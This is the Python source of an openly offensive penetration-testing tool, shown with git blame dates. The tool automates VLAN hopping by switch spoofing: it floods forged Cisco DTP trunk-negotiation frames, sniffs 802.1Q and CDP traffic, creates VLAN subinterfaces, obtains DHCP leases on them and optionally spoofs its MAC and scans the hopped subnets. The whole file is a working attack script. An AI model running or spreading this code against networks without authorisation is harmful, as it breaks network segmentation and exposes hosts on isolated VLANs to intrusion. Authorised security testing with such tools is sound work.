mgeeky-Penetration-Testing-.../networks/VLANHopperDTP.py

846 lines
26 KiB
Python
Raw Normal View History

2018-02-02 22:22:43 +01:00
#!/usr/bin/python
#
# This script is performing DTP Trunk mode detection and VLAN Hopping
# attack automatically, running sniffer afterwards to collect any other
# VLAN available.
#
# To be launched only in Unix/Linux environment as the script utilizes
# following applications:
2018-02-02 22:22:43 +01:00
# - 8021q.ko
# - vconfig
# - ifconfig / ip / route
# - dhclient
# - (optional) arp-scan
#
# Python requirements:
# - scapy
2018-02-02 22:22:43 +01:00
#
# NOTICE:
# This program uses code written by 'floodlight', which comes from here:
# https://github.com/floodlight/oftest/blob/master/src/python/oftest/afpacket.py
#
# TODO:
# - Add logic that falls back to static IP address setup when DHCP fails
# - Possibly implement custom ARP/ICMP/DHCP spoofers or launch ettercap
# - Add auto-packets capture functionality via tshark/tcpdump to specified out directory
# - Add functionality to auto-scan via arp-scan desired network
2018-02-02 22:22:43 +01:00
#
# Mariusz B. / mgeeky, '18, <mb@binary-offensive.com>
2018-02-02 22:22:43 +01:00
#
import os
import re
2018-02-02 22:22:43 +01:00
import sys
import socket
import struct
import textwrap
2018-02-02 22:22:43 +01:00
import argparse
import tempfile
import commands
import threading
import subprocess
import fcntl, socket, struct
from ctypes import *
try:
from scapy.all import *
except ImportError:
print('[!] Scapy required: pip install scapy')
sys.exit(1)
VERSION = '0.4'
2018-02-02 22:22:43 +01:00
config = {
'verbose' : False,
'debug' : False,
'force' : False,
'count' : 10,
'timeout' : 90,
'analyse' : False,
'interface' : '',
'macaddr' : '',
'inet' : '',
'origmacaddr' : '',
'commands' : [],
'exitcommands' : [],
}
arpScanAvailable = False
2018-02-02 22:22:43 +01:00
stopThreads = False
attackEngaged = False
dot1qSnifferStarted = False
vlansDiscovered = set()
vlansHopped = set()
vlansLeases = {}
2018-02-02 22:22:43 +01:00
subinterfaces = set()
cdpsCollected = set()
2018-02-02 22:22:43 +01:00
tempfiles = []
#
# ===============================================
# Floodlight's afpacket definitions
#
ETH_P_8021Q = 0x8100
SOL_PACKET = 263
PACKET_AUXDATA = 8
TP_STATUS_VLAN_VALID = 1 << 4
class struct_iovec(Structure):
_fields_ = [
("iov_base", c_void_p),
("iov_len", c_size_t),
]
class struct_msghdr(Structure):
_fields_ = [
("msg_name", c_void_p),
("msg_namelen", c_uint32),
("msg_iov", POINTER(struct_iovec)),
("msg_iovlen", c_size_t),
("msg_control", c_void_p),
("msg_controllen", c_size_t),
("msg_flags", c_int),
]
class struct_cmsghdr(Structure):
_fields_ = [
("cmsg_len", c_size_t),
("cmsg_level", c_int),
("cmsg_type", c_int),
]
class struct_tpacket_auxdata(Structure):
_fields_ = [
("tp_status", c_uint),
("tp_len", c_uint),
("tp_snaplen", c_uint),
("tp_mac", c_ushort),
("tp_net", c_ushort),
("tp_vlan_tci", c_ushort),
("tp_padding", c_ushort),
]
libc = CDLL("libc.so.6")
recvmsg = libc.recvmsg
recvmsg.argtypes = [c_int, POINTER(struct_msghdr), c_int]
recvmsg.retype = c_int
def enable_auxdata(sk):
"""
Ask the kernel to return the VLAN tag in a control message
Must be called on the socket before afpacket.recv.
"""
sk.setsockopt(SOL_PACKET, PACKET_AUXDATA, 1)
def recv(sk, bufsize):
"""
Receive a packet from an AF_PACKET socket
@sk Socket
@bufsize Maximum packet size
"""
buf = create_string_buffer(bufsize)
ctrl_bufsize = sizeof(struct_cmsghdr) + sizeof(struct_tpacket_auxdata) + sizeof(c_size_t)
ctrl_buf = create_string_buffer(ctrl_bufsize)
iov = struct_iovec()
iov.iov_base = cast(buf, c_void_p)
iov.iov_len = bufsize
msghdr = struct_msghdr()
msghdr.msg_name = None
msghdr.msg_namelen = 0
msghdr.msg_iov = pointer(iov)
msghdr.msg_iovlen = 1
msghdr.msg_control = cast(ctrl_buf, c_void_p)
msghdr.msg_controllen = ctrl_bufsize
msghdr.msg_flags = 0
rv = recvmsg(sk.fileno(), byref(msghdr), 0)
if rv < 0:
raise RuntimeError("recvmsg failed: rv=%d", rv)
# The kernel only delivers control messages we ask for. We
# only enabled PACKET_AUXDATA, so we can assume it's the
# only control message.
assert msghdr.msg_controllen >= sizeof(struct_cmsghdr)
cmsghdr = struct_cmsghdr.from_buffer(ctrl_buf) # pylint: disable=E1101
assert cmsghdr.cmsg_level == SOL_PACKET
assert cmsghdr.cmsg_type == PACKET_AUXDATA
auxdata = struct_tpacket_auxdata.from_buffer(ctrl_buf, sizeof(struct_cmsghdr)) # pylint: disable=E1101
if auxdata.tp_vlan_tci != 0 or auxdata.tp_status & TP_STATUS_VLAN_VALID:
# Insert VLAN tag
tag = struct.pack("!HH", ETH_P_8021Q, auxdata.tp_vlan_tci)
return buf.raw[:12] + tag + buf.raw[12:rv]
else:
return buf.raw[:rv]
#
# ===============================================
#
class Logger:
@staticmethod
def _out(x):
if config['debug'] or config['verbose']:
sys.stdout.write(x + '\n')
@staticmethod
def dbg(x):
if config['debug']:
sys.stdout.write('[dbg] ' + x + '\n')
@staticmethod
def out(x):
Logger._out('[.] ' + x)
@staticmethod
def info(x):
Logger._out('[?] ' + x)
@staticmethod
def err(x):
sys.stdout.write('[!] ' + x + '\n')
@staticmethod
def fail(x):
Logger._out('[-] ' + x)
@staticmethod
def ok(x):
Logger._out('[+] ' + x)
def inspectPacket(dtp):
tlvs = dtp['DTP'].tlvlist
stat = -1
for tlv in tlvs:
if tlv.type == 2:
stat = ord(tlv.status)
break
ret = True
if stat == -1:
Logger.fail('Something went wrong: Got invalid DTP packet.')
ret = False
elif stat == 2:
Logger.fail('DTP disabled, Switchport in Access mode configuration')
print('[!] VLAN Hopping is not possible.')
ret = False
elif stat == 3:
Logger.ok('DTP enabled, Switchport in default configuration')
print('[+] VLAN Hopping is possible.')
elif stat == 4 or stat == 0x84:
Logger.ok('DTP enabled, Switchport in Dynamic Auto configuration')
print('[+] VLAN Hopping is possible.')
elif stat == 0x83:
Logger.ok('DTP enabled, Switchport in Trunk/Desirable configuration')
print('[+] VLAN Hopping is possible.')
2018-02-02 22:22:43 +01:00
elif stat == 0x81:
Logger.ok('DTP enabled, Switchport in Trunk configuration')
print('[+] VLAN Hopping IS possible.')
elif stat == 0xa5:
Logger.info('DTP enabled, Switchport in Trunk with 802.1Q encapsulation forced configuration')
print('[?] VLAN Hopping may be possible.')
elif stat == 0x42:
Logger.info('DTP enabled, Switchport in Trunk with ISL encapsulation forced configuration')
print('[?] VLAN Hopping may be possible.')
else:
Logger.info('Unknown DTP packet.')
Logger.dbg(dtp.show())
ret = False
2018-02-02 22:22:43 +01:00
if ret:
print('\n[>] After Hopping to other VLANs - leave this program running to maintain connections.')
2018-02-02 22:22:43 +01:00
return ret
def floodTrunkingRequests():
while not stopThreads:
# Ethernet
dot3 = Dot3(src = config['macaddr'], dst = '01:00:0c:cc:cc:cc', len = 42)
# Logical-Link Control
llc = LLC(dsap = 0xaa, ssap = 0xaa, ctrl = 3)
# OUT = Cisco, Code = DTP
snap = SNAP(OUI = 0x0c, code = 0x2004)
# DTP, Status = Access/Desirable (3), Type: Trunk (3)
dtp = DTP(ver = 1, tlvlist = [
DTPDomain(length = 13, type = 1, domain = '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'),
DTPStatus(status = '\\x03', length = 5, type = 2),
DTPType(length = 5, type = 3, dtptype = '\\xa5'),
DTPNeighbor(type = 4, neighbor = config['macaddr'], len = 10)
])
frame = dot3 / llc / snap / dtp
Logger.dbg('SENT: DTP Trunk Keep-Alive:\n{}'.format(frame.summary()))
send(frame, iface = config['interface'], verbose = False)
2018-02-07 10:23:02 +01:00
time.sleep(config['timeout'] / 3)
2018-02-02 22:22:43 +01:00
def engageDot1qSniffer():
global dot1qSnifferStarted
if dot1qSnifferStarted:
return
dot1qSnifferStarted = True
#Logger.info('Started VLAN/802.1Q sniffer.')
2018-02-02 22:22:43 +01:00
sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
sock.bind((config['interface'], ETH_P_ALL))
enable_auxdata(sock)
print('[>] Discovering new VLANs...')
while not stopThreads:
buf = recv(sock, 65535)
pkt = Ether(buf)
if pkt.haslayer(Dot1Q):
dot1q = pkt.vlan
if dot1q not in vlansDiscovered:
2018-02-02 22:22:43 +01:00
print('==> VLAN discovered: {}'.format(dot1q))
vlansDiscovered.add(dot1q)
2018-02-02 22:22:43 +01:00
if not config['analyse']:
t = threading.Thread(target = addVlanIface, args = (dot1q, ))
t.daemon = True
t.start()
else:
Logger.info('Analysis mode: Did not go any further.')
Logger.info('Stopped VLAN/802.1Q sniffer.')
def processDtps(dtps):
global attackEngaged
if stopThreads: return
if attackEngaged == False:
success = False
for dtp in dtps:
if dtp.haslayer(DTP):
if inspectPacket(dtp):
success = True
break
if success:
#Logger.ok('VLAN Hopping via Switch Spoofing may be possible.')
Logger.dbg('Flooding with fake Access/Desirable DTP frames...\n')
2018-02-02 22:22:43 +01:00
t = threading.Thread(target = floodTrunkingRequests)
t.daemon = True
t.start()
attackEngaged = True
time.sleep(5)
2018-02-07 10:23:02 +01:00
if config['force']:
Logger.ok('FORCED VLAN Hopping via Switch Spoofing.')
Logger.ok('Flooding with fake Access/Desirable DTP frames...\n')
t = threading.Thread(target = floodTrunkingRequests)
t.daemon = True
t.start()
attackEngaged = True
time.sleep(5)
2018-02-02 22:22:43 +01:00
if attackEngaged:
engageDot1qSniffer()
def launchCommand(subif, cmd, forceOut = False, noCmd = False):
2018-02-02 22:22:43 +01:00
# following placeholders in command:
# $GW (gateway),
# $MASK (full mask),
Logger.dbg('Subinterface: {}, Parsing command: "{}"'.format(subif, cmd))
if '%IFACE' in cmd: cmd = cmd.replace('%IFACE', subif)
if '%HWADDR' in cmd: cmd = cmd.replace('%HWADDR', getHwAddr(subif))
if '%IP' in cmd: cmd = cmd.replace('%IP', getIfaceIP(subif))
if '%NET' in cmd: cmd = cmd.replace('%NET', shell("route -n | grep " + subif + " | grep -v UG | awk '{print $1}' | head -1"))
if '%MASK' in cmd: cmd = cmd.replace('%MASK', shell("route -n | grep " + subif + " | grep -v UG | awk '{print $3}' | head -1"))
if '%GW' in cmd: cmd = cmd.replace('%GW', shell("route -n | grep " + subif + " | grep UG | awk '{print $2}' | head -1"))
if '%CIDR' in cmd: cmd = cmd.replace('%CIDR', '/' + shell("ip addr show " + subif + " | grep 'inet ' | awk '{print $2}' | cut -d/ -f2"))
cmd = cmd.strip()
2018-02-02 22:22:43 +01:00
if not noCmd:
print('[>] Launching command: "{}"'.format(cmd))
out = shell(cmd)
2018-02-02 22:22:43 +01:00
if forceOut:
print('\n' + '.' * 50)
print(out)
print('.' * 50 + '\n')
else:
Logger.info(out)
def launchCommands(subif, commands, forceOut = False, noCmd = False):
2018-02-02 22:22:43 +01:00
for cmd in commands:
launchCommand(subif, cmd, forceOut, noCmd)
2018-02-02 22:22:43 +01:00
def addVlanIface(vlan):
global subinterfaces
global vlansLeases
2018-02-02 22:22:43 +01:00
global tempfiles
subif = '{}.{}'.format(config['interface'], vlan)
if subif in subinterfaces:
Logger.fail('Already created that subinterface: {}'.format(subif))
return
Logger.dbg('Creating new VLAN Subinterface for {}.'.format(vlan))
2018-02-02 22:22:43 +01:00
out = shell('vconfig add {} {}'.format(
config['interface'], vlan
))
if out.startswith('Added VLAN with VID == {}'.format(vlan)):
subinterfaces.add(subif)
pidFile = tempfile.NamedTemporaryFile().name
dbFile = tempfile.NamedTemporaryFile().name
tempfiles.append(pidFile)
tempfiles.append(dbFile)
2018-02-07 10:23:02 +01:00
Logger.dbg('So far so good, subinterface {} added.'.format(subif))
2018-02-02 22:22:43 +01:00
ret = False
for attempt in range(2):
2018-02-02 22:22:43 +01:00
Logger.dbg('Acquiring DHCP lease for {}'.format(subif))
shell('dhclient -lf {} -pf {} -r {}'.format(dbFile, pidFile, subif))
time.sleep(3)
if attempt > 0:
shell('dhclient -lf {} -pf {} -x {}'.format(dbFile, pidFile, subif))
time.sleep(3)
shell('dhclient -lf {} -pf {} {}'.format(dbFile, pidFile, subif))
time.sleep(3)
ip = getIfaceIP(subif)
if ip:
Logger.dbg('Subinterface obtained IP: {}'.format(ip))
2018-02-02 22:22:43 +01:00
ret = True
vlansHopped.add(vlan)
vlansLeases[vlan] = (
ip,
shell("route -n | grep " + subif + " | grep -v UG | awk '{print $1}' | head -1"),
shell("ip addr show " + subif + " | grep 'inet ' | awk '{print $2}' | cut -d/ -f2")
)
print('[+] Hopped to VLAN {}.: {}, subnet: {}/{}'.format(
vlan,
vlansLeases[vlan][0],
vlansLeases[vlan][1],
vlansLeases[vlan][2]
))
2018-02-02 22:22:43 +01:00
launchCommands(subif, config['commands'])
if arpScanAvailable:
Logger.info('ARP Scanning connected subnet.')
print('[>] Other hosts in hopped subnet: ')
launchCommand(subif, "arp-scan -x -g --vlan={} -I %IFACE %NET%CIDR".format(vlan), True, True)
2018-02-02 22:22:43 +01:00
break
else:
Logger.dbg('Subinterface {} did not receive DHCPOFFER.'.format(
subif
))
2018-02-02 22:22:43 +01:00
time.sleep(5)
if not ret:
Logger.fail('Could not acquire DHCP lease for: {}. Skipping.'.format(subif))
2018-02-02 22:22:43 +01:00
else:
Logger.fail('Failed.: "{}"'.format(out))
def addVlansFromCdp(vlans):
while not attackEngaged:
time.sleep(3)
if stopThreads:
return
for vlan in vlans:
Logger.info('Trying to hop to VLAN discovered in CDP packet: {}'.format(
vlan
))
t = threading.Thread(target = addVlanIface, args = (vlan, ))
t.daemon = True
t.start()
vlansDiscovered.add(vlan)
def processCdp(pkt):
global cdpsCollected
global vlansDiscovered
if not Dot3 in pkt or not pkt.dst == '01:00:0c:cc:cc:cc':
return
if not hasattr(pkt, 'msg'):
return
tlvs = {
1: 'Device Hostname',
2: 'Addresses',
3: 'Port ID',
4: 'Capabilities',
5: 'Software Version',
6: 'Software Platform',
9: 'VTP Management Domain',
10:'Native VLAN',
14:'VoIP VLAN',
22:'Management Address',
}
vlans = set()
out = ''
for tlv in pkt.msg:
if tlv.type in tlvs.keys():
fmt = ''
key = ' {}:'.format(tlvs[tlv.type])
key = key.ljust(25)
if hasattr(tlv, 'val'): fmt = tlv.val
elif hasattr(tlv, 'iface'): fmt = tlv.iface
elif hasattr(tlv, 'cap'):
caps = []
if tlv.cap & (2**0) != 0: caps.append("Router")
if tlv.cap & (2**1) != 0: caps.append("TransparentBridge")
if tlv.cap & (2**2) != 0: caps.append("SourceRouteBridge")
if tlv.cap & (2**3) != 0: caps.append("Switch")
if tlv.cap & (2**4) != 0: caps.append("Host")
if tlv.cap & (2**5) != 0: caps.append("IGMPCapable")
if tlv.cap & (2**6) != 0: caps.append("Repeater")
fmt = '+'.join(caps)
elif hasattr(tlv, 'vlan'):
fmt = str(tlv.vlan)
vlans.add(tlv.vlan)
elif hasattr(tlv, 'addr'):
for i in range(tlv.naddr):
addr = tlv.addr[i].addr
fmt += '{}, '.format(addr)
wrapper = textwrap.TextWrapper(
initial_indent = key,
width = 80,
subsequent_indent = ' ' * len(key)
)
out += '{}\n'.format(wrapper.fill(fmt))
out = re.sub(r'(?:\n)+', '\n', out)
if not out in cdpsCollected:
cdpsCollected.add(out)
print('\n[+] Discovered new CDP aware device:\n{}'.format(out))
if not config['analyse']:
t = threading.Thread(target = addVlansFromCdp, args = (vlans, ))
t.daemon = True
t.start()
else:
Logger.info('Analysis mode: Did not go any further.')
2018-02-02 22:22:43 +01:00
def packetCallback(pkt):
Logger.dbg('RECV: ' + pkt.summary())
if Dot3 in pkt and pkt.dst == '01:00:0c:cc:cc:cc':
processCdp(pkt)
2018-02-02 22:22:43 +01:00
def sniffThread():
global vlansDiscovered
2018-02-02 22:22:43 +01:00
warnOnce = False
Logger.info('Sniffing for CDP/DTP frames (Max count: {}, Max timeout: {} seconds)...'.format(
2018-02-02 22:22:43 +01:00
config['count'], config['timeout']
))
while not stopThreads and not attackEngaged:
dtps = []
2018-02-02 22:22:43 +01:00
try:
dtps = sniff(
count = config['count'],
filter = 'ether[20:2] == 0x2004 or ether[20:2] == 0x2000',
2018-02-02 22:22:43 +01:00
timeout = config['timeout'],
prn = packetCallback,
stop_filter = lambda x: x.haslayer(DTP) or stopThreads,
iface = config['interface']
)
except Exception as e:
if 'Network is down' in str(e):
break
Logger.err('Exception occured during sniffing: ' + str(e))
if len(dtps) == 0 and not warnOnce:
Logger.fail('It seems like there was no DTP frames transmitted.')
Logger.fail('VLAN Hopping may not be possible (unless Switch is in Non-negotiate state):')
Logger.info('\tSWITCH(config-if)# switchport nonnegotiate\t/ or / ')
Logger.info('\tSWITCH(config-if)# switchport mode access\n')
2018-02-02 22:22:43 +01:00
warnOnce = True
if len(dtps) > 0 or config['force']:
if len(dtps) > 0:
Logger.dbg('Got {} DTP frames.\n'.format(
2018-02-02 22:22:43 +01:00
len(dtps)
))
else:
Logger.info('Forced mode: Beginning attack blindly.')
t = threading.Thread(target = processDtps, args = (dtps, ))
t.daemon = True
t.start()
Logger.dbg('Stopped sniffing.')
def getHwAddr(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
return ':'.join(['%02x' % ord(char) for char in info[18:24]])
def getIfaceIP(iface):
out = shell("ip addr show " + iface + " | grep 'inet ' | awk '{print $2}' | head -1 | cut -d/ -f1")
2018-02-02 22:22:43 +01:00
Logger.dbg('Interface: {} has IP: {}'.format(iface, out))
return out
def changeMacAddress(iface, mac):
old = getHwAddr(iface)
print('[>] Changing MAC address of interface {}, from: {} to: {}'.format(
2018-02-02 22:22:43 +01:00
iface, old, mac
))
shell('ifconfig {} down'.format(iface))
shell('ifconfig {} hw ether {}'.format(iface, mac))
shell('ifconfig {} up'.format(iface))
ret = old != getHwAddr(iface)
if ret:
Logger.dbg('Changed.')
else:
Logger.dbg('Not changed.')
return ret
def assure8021qCapabilities():
if ('not found' in shell('modprobe -n 8021q')):
Logger.err('There is no kernel module named: "8021q". Fatal error.')
return False
if not shell('which vconfig'):
Logger.err('There is no "vconfig" utility. Package required: "vconfig". Fatal error.')
return False
shell('modprobe 8021q')
return True
def shell(cmd):
out = commands.getstatusoutput(cmd)[1]
Logger.dbg('shell("{}") returned:\n"{}"'.format(cmd, out))
return out
def selectDefaultInterface():
global config
commands = {
'ip' : "ip route show | grep default | awk '{print $5}' | head -1",
'ifconfig': "route -n | grep 0.0.0.0 | grep 'UG' | awk '{print $8}' | head -1",
}
for k, v in commands.items():
out = shell(v)
if len(out) > 0:
Logger.info('Default interface lookup command returned:\n{}'.format(out))
config['interface'] = out
return out
return ''
def cleanup():
if config['origmacaddr'] != config['macaddr']:
Logger.dbg('Restoring original MAC address...')
changeMacAddress(config['interface'], config['origmacaddr'])
for subif in subinterfaces:
Logger.dbg('Removing subinterface: {}'.format(subif))
launchCommands(subif, config['exitcommands'])
shell('vconfig rem {}'.format(subif))
Logger.dbg('Removing temporary files...')
for file in tempfiles:
os.remove(file)
def parseOptions(argv):
print('''
:: VLAN Hopping via DTP Trunk negotiation
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
2018-02-02 22:22:43 +01:00
v{}
'''.format(VERSION))
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
parser.add_argument('-i', '--interface', metavar='DEV', default='', help='Select interface on which to operate.')
parser.add_argument('-e', '--execute', dest='command', metavar='CMD', default=[], action='append', help='Launch specified command after hopping to new VLAN. One can use one of following placeholders in command: %%IFACE (choosen interface), %%IP (acquired IP), %%NET (net address), %%HWADDR (MAC), %%GW (gateway), %%MASK (full mask), %%CIDR (short mask). For instance: -e "arp-scan -I %%IFACE %%NET%%CIDR". May be repeated for more commands. The command will be launched SYNCHRONOUSLY, meaning - one have to append "&" at the end to make the script go along.')
parser.add_argument('-E', '--exit-execute', dest='exitcommand', metavar='CMD', default=[], action='append', help='Launch specified command at the end of this script (during cleanup phase).')
parser.add_argument('-m', '--mac-address', metavar='HWADDR', dest='mac', default='', help='Changes MAC address of the interface before and after attack.')
#parser.add_argument('-O', '--outdir', metavar='DIR', dest='outdir', default='', help='If set, enables packet capture on interface connected to VLAN Hopped network and stores in specified output directory *.pcap files.')
2018-02-02 22:22:43 +01:00
parser.add_argument('-f', '--force', action='store_true', help='Attempt VLAN Hopping even if DTP was not detected (like in Nonegotiate situation).')
parser.add_argument('-a', '--analyse', action='store_true', help='Analyse mode: do not create subinterfaces, don\'t ask for DHCP leases.')
parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
parser.add_argument('-d', '--debug', action='store_true', help='Display debug output.')
args = parser.parse_args()
config['verbose'] = args.verbose
config['debug'] = args.debug
config['analyse'] = args.analyse
config['force'] = args.force
config['interface'] = args.interface
config['commands'] = args.command
config['exitcommands'] = args.exitcommand
2018-02-07 10:23:02 +01:00
if args.force:
config['timeout'] = 30
2018-02-02 22:22:43 +01:00
return args
def printStats():
print('\n' + '-' * 80)
print('\tSTATISTICS\n')
print('[VLANS HOPPED]')
if len(vlansHopped):
print('Successfully hopped (and got DHCP lease) to following VLANs ({}):'.format(
len(vlansHopped)
))
for vlan, net in vlansLeases.items():
print('- VLAN {}: {}, subnet: {}/{}'.format(vlan, net[0], net[1], net[2] ))
else:
print('Did not hop into any VLAN.')
print('\n[VLANS DISCOVERED]')
if len(vlansDiscovered):
print('Discovered following VLANs ({}):'.format(
len(vlansDiscovered)
))
for vlan in vlansDiscovered:
print('- VLAN {}'.format(vlan))
else:
print('No VLANs discovered.')
print('\n[CDP DEVICES]')
if len(cdpsCollected):
print('Discovered following CDP aware devices ({}):'.format(
len(cdpsCollected)
))
for dev in cdpsCollected:
print(dev + '\n')
else:
print('No CDP aware devices discovered.')
2018-02-02 22:22:43 +01:00
def main(argv):
global config
global stopThreads
global arpScanAvailable
2018-02-02 22:22:43 +01:00
opts = parseOptions(argv)
if not opts:
Logger.err('Options parsing failed.')
return False
if os.getuid() != 0:
Logger.err('This program must be run as root.')
return False
load_contrib('dtp')
load_contrib('cdp')
2018-02-02 22:22:43 +01:00
if not assure8021qCapabilities():
Logger.err('Unable to proceed.')
return False
if not opts.interface:
if not selectDefaultInterface():
Logger.err('Could not find suitable interface. Please specify it.')
return False
print('[>] Interface to work on: "{}"'.format(config['interface']))
config['origmacaddr'] = config['macaddr'] = getHwAddr(config['interface'])
if not config['macaddr']:
Logger.err('Could not acquire MAC address of interface: "{}"'.format(
config['interface']
))
return False
else:
Logger.dbg('Interface "{}" has MAC address: "{}"'.format(
config['interface'], config['macaddr']
))
config['inet'] = getIfaceIP(config['interface'])
if not config['inet']:
Logger.fail('Could not acquire interface\'s IP address! Proceeding...')
oldMac = config['macaddr']
if opts.mac:
oldMac = changeMacAddress(config['interface'], opts.mac)
if oldMac:
config['macaddr'] = opts.mac
else:
Logger.err('Could not change interface\'s MAC address!')
return False
if shell("which arp-scan") != '':
arpScanAvailable = True
else:
Logger.err('arp-scan not available: will not perform scanning after hopping.')
2018-02-02 22:22:43 +01:00
t = threading.Thread(target = sniffThread)
t.daemon = True
t.start()
try:
while True:
pass
except KeyboardInterrupt:
print('\n[>] Cleaning up...')
stopThreads = True
time.sleep(3)
cleanup()
printStats()
2018-02-02 22:22:43 +01:00
return True
if __name__ == '__main__':
main(sys.argv)